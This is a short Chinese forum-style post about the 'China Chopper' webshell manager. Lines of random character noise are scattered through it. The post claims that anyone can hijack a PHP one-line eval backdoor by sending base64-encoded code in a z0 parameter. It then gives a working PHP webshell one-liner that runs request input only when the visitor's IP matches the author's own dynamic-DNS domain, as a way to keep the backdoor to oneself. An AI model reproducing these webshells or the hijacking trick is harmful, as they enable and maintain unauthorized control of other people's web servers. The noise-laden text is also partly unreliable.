今天试了下“中国菜刀”这款C/S的WEB管理软件,发现一个致命的漏洞
. ]$ Z3 d/ _) Q5 h! x& I8 D3 ^& M9 A0 I. |
就算你设置了密码,使用了eval($_REQUEST['moyo']);
0 Q, x$ `# E8 k3 a( [1 J1 E) h2 t) D
+ u, j8 {& u! D, k& i# h但是别人还是可以在不知道连接密码是moyo的情况下直接使用你的一句话后门0 ?/ Q9 t: o; N4 ?6 v
) t5 m8 g7 U U. I# _$ C& L
因为$_REQUEST['moyo']传递的内容是@eval(base64_decode($_POST[z0]));
& ] [5 K, c' h# ]; p$ v6 Q1 H" L& w5 I, N8 u' U
直接访问 /backdoor.php?z0={BASE64加密后的代码} 就可以执行代码了
+ b. T; ~: h; G D! v- L& Y: w8 Q2 M+ C) w
不知道是设计缺陷还是故意留的后门$ v/ @+ o' V) D1 ~: @* p
% D" g; Y" i+ }3 Z! u2 w S
如果有人使用一句话之类的密码,有个小技巧可以避免自己的一句话被人盗用9 W) p% M [; z2 t6 r% K, ]
. o5 p0 k& b0 ?4 ?- ^本地使用花生壳之类的DDNS软件,比如分配域名是moyo.apiz.org3 J+ p) c2 E3 I# @4 v8 ^
0 Q1 ~4 S5 {+ P6 y$ o2 |然后一句话后门这样写% |) n) d0 x& o. ]" v( H
# s) Y4 a+ g; W" h8 X& ?<?php $_SERVER['REMOTE_ADDR'] == gethostbyname('moyo.apiz.org') ? @eval($_REQUEST['moyo']) : exit('DENIED') ?>4 Z7 g4 w: B/ H# t
这样就可以让一句话后门只允许自己的电脑连接了, ]: y9 S# f8 e( H9 `* U/ q
: U$ _9 s7 K& L, |4 t5 Q |